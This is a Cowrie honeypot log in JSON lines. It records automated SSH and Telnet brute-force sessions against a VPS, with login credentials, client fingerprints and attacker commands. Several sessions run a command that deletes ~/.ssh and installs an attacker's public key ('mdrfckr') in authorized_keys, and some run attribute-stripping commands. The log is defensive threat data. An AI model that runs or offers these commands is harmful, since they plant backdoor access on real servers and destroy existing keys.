{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:49:11.786305Z","src_ip":"183.232.230.82","session":"e4fcae59930c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:49:12.323479Z","src_ip":"183.232.230.82","session":"e4fcae59930c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:49:12.324241Z","src_ip":"183.232.230.82","session":"e4fcae59930c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:49:12.549586Z","src_ip":"183.232.230.82","session":"e4fcae59930c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:49:12.550509Z","src_ip":"183.232.230.82","session":"e4fcae59930c"}
{"eventid":"cowrie.session.connect","src_ip":"183.232.230.82","src_port":40727,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5d3459d97a9","protocol":"ssh","message":"New connection: 183.232.230.82:40727 (1.2.3.4:22) [session: b5d3459d97a9]","sensor":"my-vps","timestamp":"2025-08-24T21:49:12.768361Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:49:12.769206Z","src_ip":"183.232.230.82","session":"b5d3459d97a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:49:12.990511Z","src_ip":"183.232.230.82","session":"b5d3459d97a9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:49:13.915195Z","src_ip":"183.232.230.82","session":"b5d3459d97a9"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:49:15.138549Z","src_ip":"183.232.230.82","session":"b5d3459d97a9"}
{"eventid":"cowrie.session.connect","src_ip":"183.232.230.82","src_port":18801,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad9384334722","protocol":"ssh","message":"New connection: 183.232.230.82:18801 (1.2.3.4:22) [session: ad9384334722]","sensor":"my-vps","timestamp":"2025-08-24T21:49:15.354175Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:49:15.355062Z","src_ip":"183.232.230.82","session":"ad9384334722"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:49:15.574261Z","src_ip":"183.232.230.82","session":"ad9384334722"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:49:16.491248Z","src_ip":"183.232.230.82","session":"ad9384334722"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:49:16.712661Z","src_ip":"183.232.230.82","session":"ad9384334722"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:49:16.716900Z","src_ip":"183.232.230.82","session":"e4fcae59930c"}
{"eventid":"cowrie.session.connect","src_ip":"114.43.11.116","src_port":49941,"dst_ip":"1.2.3.4","dst_port":23,"session":"2ea439f9543e","protocol":"telnet","message":"New connection: 114.43.11.116:49941 (1.2.3.4:23) [session: 2ea439f9543e]","sensor":"my-vps","timestamp":"2025-08-24T21:50:24.986657Z"}
{"eventid":"cowrie.session.connect","src_ip":"106.58.214.133","src_port":38544,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c9736c93971","protocol":"ssh","message":"New connection: 106.58.214.133:38544 (1.2.3.4:22) [session: 7c9736c93971]","sensor":"my-vps","timestamp":"2025-08-24T21:52:08.612358Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-24T21:52:08.613264Z","src_ip":"106.58.214.133","session":"7c9736c93971"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-24T21:52:08.836425Z","src_ip":"106.58.214.133","session":"7c9736c93971"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty123321","message":"login attempt [root/Qwerty123321] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:52:09.775515Z","src_ip":"106.58.214.133","session":"7c9736c93971"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:52:10.276374Z","src_ip":"106.58.214.133","session":"7c9736c93971"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:52:10.277066Z","src_ip":"106.58.214.133","session":"7c9736c93971"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:52:10.278260Z","src_ip":"106.58.214.133","session":"7c9736c93971"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:52:10.725881Z","src_ip":"106.58.214.133","session":"7c9736c93971"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:52:10.966320Z","src_ip":"106.58.214.133","session":"7c9736c93971"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:52:10.967062Z","src_ip":"106.58.214.133","session":"7c9736c93971"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:52:11.192163Z","src_ip":"106.58.214.133","session":"7c9736c93971"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:52:11.193048Z","src_ip":"106.58.214.133","session":"7c9736c93971"}
{"eventid":"cowrie.session.connect","src_ip":"106.58.214.133","src_port":41792,"dst_ip":"1.2.3.4","dst_port":22,"session":"1907f5493e13","protocol":"ssh","message":"New connection: 106.58.214.133:41792 (1.2.3.4:22) [session: 1907f5493e13]","sensor":"my-vps","timestamp":"2025-08-24T21:52:11.973154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-24T21:52:11.974184Z","src_ip":"106.58.214.133","session":"1907f5493e13"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-24T21:52:12.201256Z","src_ip":"106.58.214.133","session":"1907f5493e13"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:52:13.700347Z","src_ip":"106.58.214.133","session":"1907f5493e13"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:52:14.930533Z","src_ip":"106.58.214.133","session":"1907f5493e13"}
{"eventid":"cowrie.session.connect","src_ip":"106.58.214.133","src_port":46182,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b955a71a27e","protocol":"ssh","message":"New connection: 106.58.214.133:46182 (1.2.3.4:22) [session: 6b955a71a27e]","sensor":"my-vps","timestamp":"2025-08-24T21:52:16.141642Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-24T21:52:16.142625Z","src_ip":"106.58.214.133","session":"6b955a71a27e"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-24T21:52:16.366156Z","src_ip":"106.58.214.133","session":"6b955a71a27e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:52:17.842253Z","src_ip":"106.58.214.133","session":"6b955a71a27e"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:52:18.066641Z","src_ip":"106.58.214.133","session":"7c9736c93971"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:52:18.067673Z","src_ip":"106.58.214.133","session":"6b955a71a27e"}
{"eventid":"cowrie.session.closed","duration":120.00777292251587,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:52:24.994323Z","src_ip":"114.43.11.116","session":"2ea439f9543e"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63302,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b3290148314","protocol":"ssh","message":"New connection: 217.72.205.35:63302 (1.2.3.4:22) [session: 1b3290148314]","sensor":"my-vps","timestamp":"2025-08-24T21:55:25.217137Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:55:25.218639Z","src_ip":"217.72.205.35","session":"1b3290148314"}
{"eventid":"cowrie.session.connect","src_ip":"221.230.38.202","src_port":46979,"dst_ip":"1.2.3.4","dst_port":23,"session":"afc4c36c78f3","protocol":"telnet","message":"New connection: 221.230.38.202:46979 (1.2.3.4:23) [session: afc4c36c78f3]","sensor":"my-vps","timestamp":"2025-08-24T22:01:24.280606Z"}
{"eventid":"cowrie.session.closed","duration":12.783059358596802,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:01:37.063154Z","src_ip":"221.230.38.202","session":"afc4c36c78f3"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56544,"dst_ip":"1.2.3.4","dst_port":22,"session":"aafccded6557","protocol":"ssh","message":"New connection: 217.72.205.35:56544 (1.2.3.4:22) [session: aafccded6557]","sensor":"my-vps","timestamp":"2025-08-24T22:02:17.775932Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:02:17.776998Z","src_ip":"217.72.205.35","session":"aafccded6557"}
{"eventid":"cowrie.session.connect","src_ip":"171.232.109.114","src_port":52487,"dst_ip":"1.2.3.4","dst_port":23,"session":"ca934f6c7595","protocol":"telnet","message":"New connection: 171.232.109.114:52487 (1.2.3.4:23) [session: ca934f6c7595]","sensor":"my-vps","timestamp":"2025-08-24T22:03:30.811167Z"}
{"eventid":"cowrie.session.connect","src_ip":"142.181.247.250","src_port":56391,"dst_ip":"1.2.3.4","dst_port":23,"session":"8aed7c892215","protocol":"telnet","message":"New connection: 142.181.247.250:56391 (1.2.3.4:23) [session: 8aed7c892215]","sensor":"my-vps","timestamp":"2025-08-24T22:03:50.048653Z"}
{"eventid":"cowrie.session.closed","duration":31.503897666931152,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:04:02.314984Z","src_ip":"171.232.109.114","session":"ca934f6c7595"}
{"eventid":"cowrie.session.closed","duration":30.80992341041565,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:04:20.858500Z","src_ip":"142.181.247.250","session":"8aed7c892215"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63680,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b4f28bbe9e4","protocol":"ssh","message":"New connection: 217.72.205.35:63680 (1.2.3.4:22) [session: 2b4f28bbe9e4]","sensor":"my-vps","timestamp":"2025-08-24T22:08:52.396786Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:08:52.398001Z","src_ip":"217.72.205.35","session":"2b4f28bbe9e4"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":50124,"dst_ip":"1.2.3.4","dst_port":22,"session":"53ac60cef251","protocol":"ssh","message":"New connection: 45.88.8.215:50124 (1.2.3.4:22) [session: 53ac60cef251]","sensor":"my-vps","timestamp":"2025-08-24T22:09:52.973129Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:09:53.448125Z","src_ip":"45.88.8.215","session":"53ac60cef251"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T22:09:53.449955Z","src_ip":"45.88.8.215","session":"53ac60cef251"}
{"eventid":"cowrie.login.success","username":"root","password":"Bhanu@123","message":"login attempt [root/Bhanu@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T22:09:55.659817Z","src_ip":"45.88.8.215","session":"53ac60cef251"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:09:56.129340Z","src_ip":"45.88.8.215","session":"53ac60cef251"}
